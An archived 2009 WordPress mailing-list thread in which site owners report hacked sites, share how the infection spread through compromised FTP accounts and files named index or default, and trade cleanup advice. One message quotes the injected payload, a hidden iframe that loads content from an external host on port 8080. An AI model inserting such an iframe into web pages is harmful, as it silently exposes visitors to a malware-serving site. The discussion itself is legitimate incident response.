[wp-testers] Default.widgets.php Hacked? What to do?

Kirk M kmb42vt at gmail.com
Thu Jul 23 22:08:05 UTC 2009


Clean here so far (2.8.2). Guess I'll be working from Ubuntu 
to service my sites for awhile rather than Windows at least 
until I get everything changed around and my Windows parition 
fully scanned. I have several FTP accounts configured, many 
are for other site owners who ask me to maintain their WP 
powered sites. It definitely wouldn't do to have those get hacked.

On 07/23/2009 05:50 PM, Chris Carter wrote:
> Change your pwds and scan away..  I used cpanel file manager for a while to
> make sure they stopped attacking .. looking at logs, it hits and is tagged
> with googlebot, but the IP's are strange
>
> Anyway, This virus looks for files with:
>
> index*.*
> default*.*
> main*.*
> home*.*
>
> (I built a static php includes site, and only files named like the above
> were affected)
>
> Also might want to check your CGI-BIN for files that look suspicious
>
> It's basically is a bot that logs in, finds any files in all directories
> that start with the above
>
> ...funny thing was that somtimes where they inject it, PHP code throws
> errors. They need to revise their bot to work outside the<? tags :)
>
> -Chris
> 314media.com
>
> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsingh at gmail.com>wrote:
>
>> Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>
>> On Fri, Jul 24, 2009 at 2:48 AM, dinu<hello at offlineblog.net>  wrote:
>>> I had to restore from backup. the entire blog
>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>> page. But then I found hidden iframe codes on all of my pages ( including
>>> pages after login )
>>>
>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>> would think its not a wordpress issue.
>>>
>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsingh at gmail.com
>>> wrote:
>>>
>>>> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>>>
>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
>>>> Dunbar<josh2007 at findingjesustoday.com>  wrote:
>>>>> What version of wordpress are you running?
>>>>>
>>>>> --------------------------------------------------
>>>>> From: "Chris Carter"<carter.chris at gmail.com>
>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>> To:<wp-testers at lists.automattic.com>
>>>>> Cc:<wp-testers at lists.automattic.com>;<
>> wp-hackers at lists.automattic.com>
>>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>
>>>>>> I keep getting hacked with that code inserted into
>> admin/default-filters
>>>>>>
>>>>>> Chris Carter
>>>>>> President
>>>>>> 314media.com
>>>>>> 314-714-5448
>>>>>>
>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsingh at gmail.com>
>>>>   wrote:
>>>>>>
>>>>>>> I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>> inserted randomly :
>>>>>>>
>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>
>>>>>>> How to prevent further hacking? I am currently replacing all the
>> files
>>>>>>> affected since all of them affected at a certain date. I am on a
>>>>>>> shared hosting and only one blog got attacked.
>>>>>>>
>>>>>>> Regards
>>>>>>> Navjot Singh
>>>>>>> _______________________________________________
>>>>>>> wp-testers mailing list
>>>>>>> wp-testers at lists.automattic.com
>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>
>>>>>> _______________________________________________
>>>>>> wp-testers mailing list
>>>>>> wp-testers at lists.automattic.com
>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>>>> _______________________________________________
>>>>> wp-testers mailing list
>>>>> wp-testers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>>> _______________________________________________
>>>> wp-testers mailing list
>>>> wp-testers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>
>>>
>>>
>>>
>>> --
>>> With Love
>>> Dinu
>>>
>>> http://chromestory.com
>>> http://offlineblog.net
>>> _______________________________________________
>>> wp-testers mailing list
>>> wp-testers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>
>> _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers


More information about the wp-testers mailing list